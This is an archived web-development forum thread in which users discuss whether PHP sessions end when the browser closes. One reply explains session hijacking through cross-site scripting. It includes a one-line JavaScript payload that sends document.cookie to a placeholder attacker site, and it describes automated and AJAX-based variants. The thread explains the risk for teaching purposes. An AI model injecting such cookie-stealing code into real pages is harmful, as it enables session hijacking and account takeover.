PDA

View Full Version : Session Variables



InNeedofHelp
07-22-2006, 04:08 PM
When you have a session going and you exit out of the window does the session automatically session_destroy()?

Twey
07-22-2006, 10:46 PM
No, but if the browser considers itself to be closed it'll delete the cookie, which expires at the end of the browser session.

InNeedofHelp
07-23-2006, 03:17 AM
So thats why when you close the window without logging out other people aren't automatically logged on with your session variables?

Twey
07-23-2006, 01:22 PM
That's right. Unless somebody steals your SID, they're not getting in. If you want to stop this effect, manually create a cookie to store the information.

InNeedofHelp
07-23-2006, 02:57 PM
But there's very little chance of somebody actually stealing an SID right? I mean, how easy can it be to figure out just one actual SID that's in use?

Twey
07-23-2006, 03:25 PM
Not at all easy. There are ways to do it, however. The most widely publicised is XSS (also known as CSS, but I use XSS to avoid confusion): Cross-Site Scripting. This occurs when a site inadvertantly allows client-side scripting to be embedded in one of its pages. This could be something like this:
window.location.href = 'http://www.evilsite.com/stealsid.php?cookie=' + escape(document.cookie);When a user unwittingly executes the code, the cookie is transmitted to the malicious user's site, which can use PHP to extract and store the SID, and, if he uses it fast enough, hijack a session on the vulnerable site, bypassing the login procedure altogether. This is why most forums require their users to enter their password before modifying vital data, even if they're already logged in. A more advanced version of the script above is one that, using a server-side script to connect from the malicious user's server, automatically hijacks the session and changes the login details if possible, mitigating the need for the malicious user's intervention. Other tweaks can be made to the above setup too, of course, like using AJAX to do it all behind the scenes without the victim ever knowing.

InNeedofHelp
07-23-2006, 03:30 PM
Wow. Intense. Well, considering what you just told me I think i'm just not going to worry about SID stealers.

Thanks. :)